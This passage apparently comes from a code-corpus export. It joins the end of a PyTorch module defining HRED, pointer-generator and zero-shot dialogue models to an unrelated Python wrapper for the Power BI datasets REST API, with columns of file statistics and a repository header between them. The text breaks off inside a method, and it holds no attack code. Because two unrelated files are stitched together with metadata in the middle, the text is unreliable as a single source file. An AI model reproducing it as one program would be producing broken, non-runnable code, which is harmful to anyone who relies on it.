            label_ptr = flat_ptr.gather(1, labels.view(-1, 1))
            # A label word absent from the context has pointer prob exactly 0;
            # for those positions fall back to the generator gate g instead.
            not_in_ctx = label_ptr == 0
            mix_ptr = torch.cat([label_ptr, g.view(-1, 1)],
                                dim=1).gather(1, not_in_ctx.long())
            # mix_ptr = g.view(-1, 1) + label_ptr
            attention_loss = -1.0 * torch.log(mix_ptr.clamp(min=1e-10))
            attention_loss.masked_fill_(label_mask, 0)
            # Average over non-PAD tokens only; clamp avoids division by zero.
            valid_cnt = (label_mask.size(0) -
                         torch.sum(label_mask).float()).clamp(min=1e-10)
            avg_attn_loss = torch.sum(attention_loss) / valid_cnt
        else:
            avg_attn_loss = None
        return Pack(nll=rnn_loss, attn_loss=avg_attn_loss)
class HRED(BaseModel):
    """Hierarchical recurrent encoder-decoder baseline.

    Utterances are encoded by utt_encoder, the utterance sequence by
    ctx_encoder, and a DecoderRNN generates the response.
    """

    def valid_loss(self, loss, batch_cnt=None):
        # Validation objective is plain NLL.
        return loss.nll

    def __init__(self, corpus, config):
        super(HRED, self).__init__(config)
        self.vocab = corpus.vocab
        self.rev_vocab = corpus.rev_vocab
        self.vocab_size = len(self.vocab)
        self.go_id = self.rev_vocab[BOS]
        self.eos_id = self.rev_vocab[EOS]
        self.pad_id = self.rev_vocab[PAD]
        # build model here
        self.utt_encoder = RnnUttEncoder(config.utt_cell_size, config.dropout,
                                         use_attn=config.utt_type == 'attn_rnn',
                                         vocab_size=self.vocab_size,
                                         embed_dim=config.embed_size, feat_size=1)
        self.ctx_encoder = EncoderRNN(self.utt_encoder.output_size,
                                      config.ctx_cell_size,
                                      0.0,
                                      config.dropout,
                                      config.num_layer,
                                      config.rnn_cell,
                                      variable_lengths=False,
                                      bidirection=config.bi_ctx_cell)
        # Map the (possibly bidirectional / multi-layer) context state onto
        # the decoder's initial state; identity when shapes already match.
        if config.bi_ctx_cell or config.num_layer > 1:
            self.connector = Bi2UniConnector(config.rnn_cell, config.num_layer,
                                             config.ctx_cell_size,
                                             config.dec_cell_size)
        else:
            self.connector = IdentityConnector()
        self.decoder = DecoderRNN(self.vocab_size, config.max_dec_len,
                                  config.embed_size, config.dec_cell_size,
                                  self.go_id, self.eos_id,
                                  n_layers=1, rnn_cell=config.rnn_cell,
                                  input_dropout_p=config.dropout,
                                  dropout_p=config.dropout,
                                  use_attention=config.use_attn,
                                  attn_size=self.ctx_encoder.output_size,
                                  attn_mode=config.attn_type,
                                  use_gpu=config.use_gpu)
        self.nll = criterions.NLLEntropy(self.pad_id, config)

    def forward(self, data_feed, mode, gen_type='greedy', return_latent=False):
        """
        B: batch_size, D: context_size U: utt_size, X: response_size
        1. ctx_lens: B x 1
        2. ctx_utts: B x D x U
        3. ctx_confs: B x D
        4. ctx_floors: B x D
        5. out_lens: B x 1
        6. out_utts: B x X
        :param data_feed:
            {'ctx_lens': vec_ctx_lens, 'ctx_utts': vec_ctx_utts,
            'ctx_confs': vec_ctx_confs, 'ctx_floors': vec_ctx_floors,
            'out_lens': vec_out_lens, 'out_utts': vec_out_utts}
            NOTE(review): the keys actually read below are 'context_lens',
            'contexts', 'context_confs' and 'outputs'.
        :param return_label
        :param dec_type
        :return: outputs
        """
        ctx_lens = data_feed['context_lens']
        ctx_utts = self.np2var(data_feed['contexts'], LONG)
        ctx_confs = self.np2var(data_feed['context_confs'], FLOAT)
        out_utts = self.np2var(data_feed['outputs'], LONG)
        batch_size = len(ctx_lens)
        enc_inputs = self.utt_encoder(ctx_utts, ctx_confs)
        enc_outs, enc_last = self.ctx_encoder(enc_inputs, ctx_lens)
        # get decoder inputs: shift the response by one for teacher forcing
        labels = out_utts[:, 1:].contiguous()
        dec_inputs = out_utts[:, 0:-1]
        # pack attention context
        if self.config.use_attn:
            attn_inputs = enc_outs
        else:
            attn_inputs = None
        # create decoder initial states
        dec_init_state = self.connector(enc_last)
        # decode
        dec_outs, dec_last, dec_ctx = self.decoder(batch_size,
                                                   dec_inputs, dec_init_state,
                                                   attn_context=attn_inputs,
                                                   mode=mode, gen_type=gen_type,
                                                   beam_size=self.config.beam_size)
        if mode == GEN:
            return dec_ctx, labels
        else:
            if return_latent:
                return Pack(nll=self.nll(dec_outs, labels), latent_actions=dec_init_state)
            else:
                return Pack(nll=self.nll(dec_outs, labels))
class PtrHRED(PtrBase):
    """HRED variant with a pointer-generator decoder.

    The decoder can copy words from the flattened context via attention;
    training adds the auxiliary attention loss from PtrBase.
    """

    def valid_loss(self, loss, batch_cnt=None):
        # NLL plus a small weight on the pointer attention loss.
        total_loss = loss.nll + 0.01 * loss.attn_loss
        return total_loss

    def __init__(self, corpus, config):
        super(PtrHRED, self).__init__(config)
        self.vocab = corpus.vocab
        self.rev_vocab = corpus.rev_vocab
        self.vocab_size = len(self.vocab)
        self.go_id = self.rev_vocab[BOS]
        self.eos_id = self.rev_vocab[EOS]
        self.pad_id = self.rev_vocab[PAD]
        # build model here
        # Embedding is shared between the utterance encoder and the decoder.
        self.embedding = nn.Embedding(self.vocab_size, config.embed_size)
        self.utt_encoder = RnnUttEncoder(config.utt_cell_size, config.dropout,
                                         use_attn=True,
                                         vocab_size=self.vocab_size,
                                         embedding=self.embedding, feat_size=1)
        self.ctx_encoder = EncoderRNN(self.utt_encoder.output_size,
                                      config.ctx_cell_size,
                                      0.0,
                                      config.dropout,
                                      config.num_layer,
                                      config.rnn_cell,
                                      variable_lengths=False,
                                      bidirection=config.bi_ctx_cell)
        if config.bi_ctx_cell or config.num_layer > 1:
            self.connector = Bi2UniConnector(config.rnn_cell, config.num_layer,
                                             config.ctx_cell_size,
                                             config.dec_cell_size)
        else:
            self.connector = IdentityConnector()
        self.attn_size = self.ctx_encoder.output_size
        self.decoder = DecoderPointerGen(self.vocab_size, config.max_dec_len,
                                         config.embed_size, config.dec_cell_size,
                                         self.go_id, self.eos_id,
                                         n_layers=1, rnn_cell=config.rnn_cell,
                                         input_dropout_p=config.dropout,
                                         dropout_p=config.dropout,
                                         attn_size=self.attn_size,
                                         attn_mode=config.attn_type,
                                         use_gpu=config.use_gpu,
                                         embedding=self.embedding)
        self.nll_loss = criterions.NLLEntropy(self.pad_id, config)

    def forward(self, data_feed, mode, gen_type='greedy', return_latent=False):
        """
        B: batch_size, D: context_size U: utt_size, X: response_size
        1. ctx_lens: B x 1
        2. ctx_utts: B x D x U
        3. ctx_confs: B x D
        4. ctx_floors: B x D
        5. out_lens: B x 1
        6. out_utts: B x X
        :param data_feed:
            {'ctx_lens': vec_ctx_lens, 'ctx_utts': vec_ctx_utts,
            'ctx_confs': vec_ctx_confs, 'ctx_floors': vec_ctx_floors,
            'out_lens': vec_out_lens, 'out_utts': vec_out_utts}
            NOTE(review): the keys actually read below are 'context_lens',
            'contexts', 'context_confs' and 'outputs'.
        :param return_label
        :param dec_type
        :return: outputs
        """
        ctx_lens = data_feed['context_lens']
        ctx_utts = self.np2var(data_feed['contexts'], LONG)
        ctx_confs = self.np2var(data_feed['context_confs'], FLOAT)
        out_utts = self.np2var(data_feed['outputs'], LONG)
        batch_size = len(ctx_lens)
        utt_embedded, utt_outs, _, _ = self.utt_encoder(
            ctx_utts, ctx_confs, return_all=True)
        ctx_outs, ctx_last = self.ctx_encoder(utt_embedded, ctx_lens)
        # get decoder inputs: shift the response by one for teacher forcing
        labels = out_utts[:, 1:].contiguous()
        dec_inputs = out_utts[:, 0:-1]
        # create decoder initial states
        dec_init_state = self.connector(ctx_last)
        # attention: broadcast utterance-level states over their words and
        # add the word-level states, giving one vector per context word.
        ctx_outs = ctx_outs.unsqueeze(2).repeat(1, 1, ctx_utts.size(
            2), 1).view(batch_size, -1, self.ctx_encoder.output_size)
        utt_outs = utt_outs.contiguous().view(
            batch_size, -1, self.utt_encoder.output_size)
        attn_inputs = ctx_outs + utt_outs
        flat_ctx_words = ctx_utts.view(batch_size, -1)
        # decode
        dec_outs, dec_last, dec_ctx = self.decoder(batch_size, attn_inputs, flat_ctx_words,
                                                   inputs=dec_inputs, init_state=dec_init_state,
                                                   mode=mode, gen_type=gen_type)
        if mode == GEN:
            return dec_ctx, labels
        else:
            results = self.compute_loss(dec_outs, dec_ctx, labels)
            if return_latent:
                results['latent_actions'] = dec_init_state
            return results
class ZeroShotHRED(PtrBase):
    """Zero-shot HRED: ties the dialog-context latent action to the
    encoding of the gold response via an L2 distance loss, so the model
    can be driven by annotated actions when no context is given.
    """

    def __init__(self, corpus, config):
        super(ZeroShotHRED, self).__init__(config)
        self.vocab = corpus.vocab
        self.rev_vocab = corpus.rev_vocab
        self.vocab_size = len(self.vocab)
        self.go_id = self.rev_vocab[BOS]
        self.eos_id = self.rev_vocab[EOS]
        self.pad_id = self.rev_vocab[PAD]
        # build model here
        self.embedding = nn.Embedding(
            self.vocab_size, config.embed_size, padding_idx=self.pad_id)
        self.utt_encoder = RnnUttEncoder(config.utt_cell_size, config.dropout,
                                         use_attn=config.utt_type == 'rnn_attn',
                                         vocab_size=self.vocab_size,
                                         embedding=self.embedding, feat_size=1)
        self.ctx_encoder = EncoderRNN(self.utt_encoder.output_size,
                                      config.ctx_cell_size,
                                      0.0,
                                      config.dropout,
                                      config.num_layer,
                                      config.rnn_cell,
                                      variable_lengths=False,
                                      bidirection=config.bi_ctx_cell)
        # policy maps the context state into the latent-action space;
        # utt_policy is identity (responses/actions are used as-is).
        self.policy = nn_lib.Hidden2Feat(self.ctx_encoder.output_size, config.dec_cell_size,
                                         is_lstm=config.rnn_cell == 'lstm')
        self.utt_policy = lambda x: x
        self.connector = nn_lib.LinearConnector(config.dec_cell_size, config.dec_cell_size,
                                                is_lstm=config.rnn_cell == 'lstm')
        self.attn_size = self.ctx_encoder.output_size
        self.decoder = DecoderRNN(self.vocab_size, config.max_dec_len,
                                  config.embed_size, config.dec_cell_size,
                                  self.go_id, self.eos_id,
                                  n_layers=1, rnn_cell=config.rnn_cell,
                                  input_dropout_p=config.dropout,
                                  dropout_p=config.dropout,
                                  use_attention=config.use_attn,
                                  attn_size=self.ctx_encoder.output_size,
                                  attn_mode=config.attn_type,
                                  use_gpu=config.use_gpu)
        self.nll_loss = criterions.NLLEntropy(self.pad_id, config)
        self.l2_loss = criterions.L2Loss()

    def valid_loss(self, loss, batch_cnt=None):
        # NLL plus the latent-action distance term.
        total_loss = loss.distance + loss.nll
        return total_loss

    def forward(self, data_feed, mode, gen_type='greedy', return_latent=False):
        """
        B: batch_size, D: context_size U: utt_size, X: response_size
        1. ctx_lens: B x 1
        2. ctx_utts: B x D x U
        3. ctx_confs: B x D
        4. ctx_floors: B x D
        5. out_lens: B x 1
        6. out_utts: B x X
        :param data_feed:
            {'ctx_lens': vec_ctx_lens, 'ctx_utts': vec_ctx_utts,
            'ctx_confs': vec_ctx_confs, 'ctx_floors': vec_ctx_floors,
            'out_lens': vec_out_lens, 'out_utts': vec_out_utts}
            NOTE(review): the keys actually read below are 'context_lens',
            'contexts', 'context_confs', 'output_actions', 'domain_metas'
            and 'outputs'; all but 'outputs' are optional.
        :param return_label
        :param dec_type
        :return: outputs
        """
        # optional fields
        ctx_lens = data_feed.get('context_lens')
        ctx_utts = self.np2var(data_feed.get('contexts'), LONG)
        ctx_confs = self.np2var(data_feed.get('context_confs'), FLOAT)
        out_acts = self.np2var(data_feed.get('output_actions'), LONG)
        # NOTE(review): domain_metas is read but never used below.
        domain_metas = self.np2var(data_feed.get('domain_metas'), LONG)
        # required fields
        out_utts = self.np2var(data_feed['outputs'], LONG)
        batch_size = len(data_feed['outputs'])
        out_confs = self.np2var(np.ones((batch_size, 1)), FLOAT)
        # forward pass
        out_embedded, out_outs, _, _ = self.utt_encoder(
            out_utts.unsqueeze(1), out_confs, return_all=True)
        out_embedded = self.utt_policy(out_embedded.squeeze(1))
        # No context given -> derive the latent action from the annotated
        # output actions (the zero-shot path); otherwise from the context.
        if ctx_lens is None:
            act_embedded, act_outs, _, _ = self.utt_encoder(
                out_acts.unsqueeze(1), out_confs, return_all=True)
            act_embedded = act_embedded.squeeze(1)
            # create attention contexts
            attn_inputs = act_outs.contiguous().view(
                batch_size, -1, self.utt_encoder.output_size)
            attn_words = out_acts.view(batch_size, -1)
            latent_action = self.utt_policy(act_embedded)
        else:
            utt_embedded, utt_outs, _, _ = self.utt_encoder(
                ctx_utts, ctx_confs, return_all=True)
            ctx_outs, ctx_last = self.ctx_encoder(utt_embedded, ctx_lens)
            # create decoder initial states
            latent_action = self.policy(ctx_last)
            # create attention contexts
            ctx_outs = ctx_outs.unsqueeze(2).repeat(1, 1, ctx_utts.size(
                2), 1).view(batch_size, -1, self.ctx_encoder.output_size)
            utt_outs = utt_outs.contiguous().view(
                batch_size, -1, self.utt_encoder.output_size)
            attn_inputs = ctx_outs + utt_outs  # batch_size x num_word x attn_size
            # batch_size x num_words
            attn_words = ctx_utts.view(batch_size, -1)
        dec_init_state = self.connector(latent_action)
        # mask out PAD words in the attention inputs
        # NOTE(review): attn_words is not passed to DecoderRNN below.
        attn_inputs, attn_words = self._remove_padding(attn_inputs, attn_words)
        # get decoder inputs
        labels = out_utts[:, 1:].contiguous()
        dec_inputs = out_utts[:, 0:-1]
        # decode
        dec_outs, dec_last, dec_ctx = self.decoder(batch_size,
                                                   dec_inputs, dec_init_state,
                                                   attn_context=attn_inputs,
                                                   mode=mode, gen_type=gen_type,
                                                   beam_size=self.config.beam_size)
        if mode == GEN:
            return dec_ctx, labels
        else:
            rnn_loss = self.nll_loss(dec_outs, labels)
            loss_pack = Pack(nll=rnn_loss)
            if return_latent:
                loss_pack['latent_actions'] = latent_action
            # Tie the latent action to the gold-response encoding.
            loss_pack['distance'] = self.l2_loss(out_embedded, latent_action)
            return loss_pack
class ZeroShotPtrHRED(PtrBase):
    """Zero-shot variant with a pointer-generator decoder.

    Like ZeroShotHRED it ties the latent action to the gold-response
    encoding via an L2 loss, but decodes with DecoderPointerGen so the
    model can copy words from the attention context.
    """

    def __init__(self, corpus, config):
        super(ZeroShotPtrHRED, self).__init__(config)
        self.vocab = corpus.vocab
        self.rev_vocab = corpus.rev_vocab
        self.vocab_size = len(self.vocab)
        self.go_id = self.rev_vocab[BOS]
        self.eos_id = self.rev_vocab[EOS]
        self.pad_id = self.rev_vocab[PAD]
        # build model here
        self.embedding = nn.Embedding(
            self.vocab_size, config.embed_size, padding_idx=self.pad_id)
        self.utt_encoder = RnnUttEncoder(config.utt_cell_size, config.dropout,
                                         use_attn=config.utt_type == 'rnn_attn',
                                         vocab_size=self.vocab_size,
                                         embedding=self.embedding, feat_size=1)
        self.ctx_encoder = EncoderRNN(self.utt_encoder.output_size,
                                      config.ctx_cell_size,
                                      0.0,
                                      config.dropout,
                                      config.num_layer,
                                      config.rnn_cell,
                                      variable_lengths=False,
                                      bidirection=config.bi_ctx_cell)
        # Plain linear policy here (vs Hidden2Feat in ZeroShotHRED).
        self.policy = nn.Linear(
            self.ctx_encoder.output_size, config.dec_cell_size)
        self.utt_policy = lambda x: x
        self.connector = nn_lib.LinearConnector(config.dec_cell_size, config.dec_cell_size,
                                                is_lstm=config.rnn_cell == 'lstm')
        self.attn_size = self.ctx_encoder.output_size
        self.decoder = DecoderPointerGen(self.vocab_size, config.max_dec_len,
                                         config.embed_size, config.dec_cell_size,
                                         self.go_id, self.eos_id,
                                         n_layers=1, rnn_cell=config.rnn_cell,
                                         input_dropout_p=config.dropout,
                                         dropout_p=config.dropout,
                                         attn_size=self.attn_size,
                                         attn_mode=config.attn_type,
                                         use_gpu=config.use_gpu,
                                         embedding=self.embedding)
        self.nll_loss = criterions.NLLEntropy(self.pad_id, config)
        self.l2_loss = criterions.L2Loss()

    def valid_loss(self, loss, batch_cnt=None):
        # NLL + latent distance + small weight on the pointer attention loss.
        total_loss = loss.distance + loss.nll + 0.01 * loss.attn_loss
        return total_loss

    def forward(self, data_feed, mode, gen_type='greedy', return_latent=False):
        """Run one batch; see ZeroShotHRED.forward for the data_feed layout.

        Reads 'context_lens', 'contexts', 'context_confs', 'output_actions'
        (all optional) and 'outputs' (required) from data_feed.
        """
        # optional fields
        ctx_lens = data_feed.get('context_lens')
        ctx_utts = self.np2var(data_feed.get('contexts'), LONG)
        ctx_confs = self.np2var(data_feed.get('context_confs'), FLOAT)
        out_acts = self.np2var(data_feed.get('output_actions'), LONG)
        # required fields
        out_utts = self.np2var(data_feed['outputs'], LONG)
        batch_size = len(data_feed['outputs'])
        out_confs = self.np2var(np.ones((batch_size, 1)), FLOAT)
        out_embedded, out_outs, _, _ = self.utt_encoder(
            out_utts.unsqueeze(1), out_confs, return_all=True)
        out_embedded = self.utt_policy(out_embedded.squeeze(1))
        # No context -> zero-shot path driven by annotated output actions.
        if ctx_lens is None:
            act_embedded, act_outs, _, _ = self.utt_encoder(
                out_acts.unsqueeze(1), out_confs, return_all=True)
            act_embedded = act_embedded.squeeze(1)
            # create attention contexts
            attn_inputs = act_outs.contiguous().view(
                batch_size, -1, self.utt_encoder.output_size)
            attn_words = out_acts.view(batch_size, -1)
            latent_action = self.utt_policy(act_embedded)
        else:
            utt_embedded, utt_outs, _, _ = self.utt_encoder(
                ctx_utts, ctx_confs, return_all=True)
            ctx_outs, ctx_last = self.ctx_encoder(utt_embedded, ctx_lens)
            pi_inputs = self._gather_last_out(ctx_outs, ctx_lens)
            # create decoder initial states
            latent_action = self.policy(pi_inputs)
            # create attention contexts
            ctx_outs = ctx_outs.unsqueeze(2).repeat(1, 1, ctx_utts.size(
                2), 1).view(batch_size, -1, self.ctx_encoder.output_size)
            utt_outs = utt_outs.contiguous().view(
                batch_size, -1, self.utt_encoder.output_size)
            attn_inputs = ctx_outs + utt_outs  # batch_size x num_word x attn_size
            # batch_size x num_words
            attn_words = ctx_utts.view(batch_size, -1)
        dec_init_state = self.connector(latent_action)
        # mask out PAD words in the attention inputs
        attn_inputs, attn_words = self._remove_padding(attn_inputs, attn_words)
        # get decoder inputs
        labels = out_utts[:, 1:].contiguous()
        dec_inputs = out_utts[:, 0:-1]
        # decode
        dec_outs, dec_last, dec_ctx = self.decoder(batch_size, attn_inputs, attn_words,
                                                   inputs=dec_inputs, init_state=dec_init_state,
                                                   mode=mode, gen_type=gen_type)
        if mode == GEN:
            return dec_ctx, labels
        else:
            loss_pack = self.compute_loss(dec_outs, dec_ctx, labels)
            if return_latent:
                loss_pack['latent_actions'] = latent_action
            # Tie the latent action to the gold-response encoding.
            loss_pack['distance'] = self.l2_loss(out_embedded, latent_action)
            return loss_pack
| 43.166983
| 96
| 0.549651
| 2,690
| 22,749
| 4.32974
| 0.077695
| 0.023182
| 0.025243
| 0.023182
| 0.874818
| 0.858504
| 0.853954
| 0.843307
| 0.82957
| 0.815575
| 0
| 0.010554
| 0.366917
| 22,749
| 526
| 97
| 43.249049
| 0.798153
| 0.090773
| 0
| 0.794366
| 0
| 0
| 0.016389
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03662
| false
| 0
| 0.039437
| 0.002817
| 0.129577
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
01349e9d3884f582243e79a7a4365f94ee3791b1
| 51,252
|
py
|
Python
|
simplepbi/datasets/__init__.py
|
ladataweb/SimplePBI
|
b9743bbb75517edda7eeea1388ab109cc8599c7c
|
[
"MIT"
] | null | null | null |
simplepbi/datasets/__init__.py
|
ladataweb/SimplePBI
|
b9743bbb75517edda7eeea1388ab109cc8599c7c
|
[
"MIT"
] | null | null | null |
simplepbi/datasets/__init__.py
|
ladataweb/SimplePBI
|
b9743bbb75517edda7eeea1388ab109cc8599c7c
|
[
"MIT"
] | null | null | null |
'''
/¯¯¯¯¯¯¯¯¯\
/ \
| | __ | *********************************************
| | | \ | Code written by Ignacio and Martin.
| | | | |
| |__|_ | | La Data Web
| |__/ | *********************************************
\ /
\__________/
'''
import json
import requests
from simplepbi import utils
import pandas as pd
class Datasets():
"""Simple library to use the Power BI api and obtain datasets from it.
"""
    def __init__(self, token):
        """Create a simplePBI object to request the datasets API.

        Args:
            token: String
                Bearer Token to use the Power Bi Rest API
        """
        # Bearer token reused by every request method in this class.
        self.token = token
def get_dataset(self, dataset_id):
"""Returns the specified dataset from My workspace.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing a dataset in My workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/datasets/{}".format(dataset_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_dataset_in_group(self, workspace_id, dataset_id):
"""Returns the specified dataset from the specified workspace.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing a dataset in the workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}".format(workspace_id, dataset_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_datasets(self):
"""Returns a list of datasets from My workspace.
### Parameters
----
None
### Returns
----
Dict:
A dictionary containing all the datasets in My workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/datasets"
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_datasets_in_group(self, workspace_id):
"""Returns a list of datasets from the specified workspace.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing all the datasets in the workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets".format(workspace_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_datasources(self, dataset_id):
"""Returns a list of data sources for the specified dataset from My workspace.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing all the datasources in the dataset from My workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/datasets/{}/datasources".format(dataset_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_datasources_in_group(self, workspace_id, dataset_id):
"""Returns a list of data sources for the specified dataset from the specified workspace
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing all the datasources in the dataset from the workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/{}/datasources".format(workspace_id, dataset_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_dataset_to_dataflows_links_in_group(self, workspace_id):
"""Returns a list of upstream dataflows for datasets from the specified workspace.
### Parameters
----
workspace_id: str uuid
The Power Bi workspace id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing all upstream dataflows in the dataset from a workspace
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/groups/{}/datasets/upstreamDataflows".format(workspace_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
if res.text == '':
res.raise_for_status()
return res
else:
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_direct_query_refresh_schedule(self, dataset_id):
"""Returns the refresh schedule for a specified DirectQuery or LiveConnection dataset from My workspace.
### Parameters
----
dataset_id: str uuid
The Power Bi Dataset id. You can take it from PBI Service URL
### Returns
----
Dict:
A dictionary containing the direct query refresh schedule in a dataset from My workspace.
"""
try:
url = "https://api.powerbi.com/v1.0/myorg/datasets/{}/directQueryRefreshSchedule".format(dataset_id)
res = requests.get(url, headers={'Content-Type': 'application/json', "Authorization": "Bearer {}".format(self.token)})
res.raise_for_status()
return res.json()
except requests.exceptions.HTTPError as ex:
print("HTTP Error: ", ex, "\nText: ", ex.response.text)
except requests.exceptions.RequestException as e:
print("Request exception: ", e)
def get_direct_query_refresh_schedule_in_group(self, workspace_id, dataset_id):
    """Return the refresh schedule of a DirectQuery or LiveConnection dataset in a workspace.

    Parameters
    ----------
    workspace_id : str (uuid)
        The Power BI workspace id (visible in the PBI Service URL).
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).

    Returns
    -------
    dict
        The direct query refresh schedule, or None if the request failed.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/groups/{workspace_id}/datasets/{dataset_id}/directQueryRefreshSchedule"
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.get(endpoint, headers=request_headers)
        response.raise_for_status()
        return response.json()
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def get_gateway_datasources(self, dataset_id):
    """Deprecated endpoint wrapper: use Get Datasources instead.

    Parameters
    ----------
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).

    Returns
    -------
    None
        Only prints a deprecation notice; no request is made.
    """
    print("This API is deprecated, use Get Datasources instead.")
def get_gateway_datasources_in_group(self, dataset_id):
    """Deprecated endpoint wrapper: use Get Datasources In Group instead.

    Parameters
    ----------
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).

    Returns
    -------
    None
        Only prints a deprecation notice; no request is made.
    """
    print("This API is deprecated, use Get Datasources In Group instead.")
def get_parameters(self, dataset_id):
    """Return the parameters of a dataset in My workspace.

    Parameters
    ----------
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).

    Returns
    -------
    dict
        The dataset's parameters, or None if the request failed.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/datasets/{dataset_id}/parameters"
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.get(endpoint, headers=request_headers)
        response.raise_for_status()
        return response.json()
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def get_parameters_in_group(self, workspace_id, dataset_id):
    """Return the parameters of a dataset in the given workspace.

    Parameters
    ----------
    workspace_id : str (uuid)
        The Power BI workspace id (visible in the PBI Service URL).
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).

    Returns
    -------
    dict
        The dataset's parameters, or None if the request failed.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/groups/{workspace_id}/datasets/{dataset_id}/parameters"
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.get(endpoint, headers=request_headers)
        response.raise_for_status()
        return response.json()
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def get_refresh_history(self, dataset_id, top=None):
    """Return the refresh history of a dataset in My workspace.

    Parameters
    ----------
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).
    top : int, optional
        Maximum number of history entries to request; all entries when omitted.

    Returns
    -------
    dict
        The dataset's refresh history, or None if the request failed.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/datasets/{dataset_id}/refreshes"
    if top is not None:
        endpoint += f"?$top={top}"
    request_headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {self.token}",
    }
    try:
        response = requests.get(endpoint, headers=request_headers)
        response.raise_for_status()
        return response.json()
    except requests.exceptions.HTTPError as ex:
        print("HTTP Error: ", ex, "\nText: ", ex.response.text)
    except requests.exceptions.RequestException as e:
        print("Request exception: ", e)
def get_refresh_history_in_group(self, workspace_id, dataset_id, top=None):
    """Return the refresh history of a dataset in the given workspace.

    Parameters
    ----------
    workspace_id : str (uuid)
        The Power BI workspace id (visible in the PBI Service URL).
    dataset_id : str (uuid)
        The Power BI dataset id (visible in the PBI Service URL).
    top : int, optional
        Maximum number of history entries to request; all entries when omitted.

    Returns
    -------
    dict
        The dataset's refresh history, or None if the request failed.
    """
    endpoint = f"https://api.powerbi.com/v1.0/myorg/groups/{workspace_id}/datasets/{dataset_id}/refreshes"
    if top is not None:
        endpoint += f"?$top={top}"
    request_headers = {
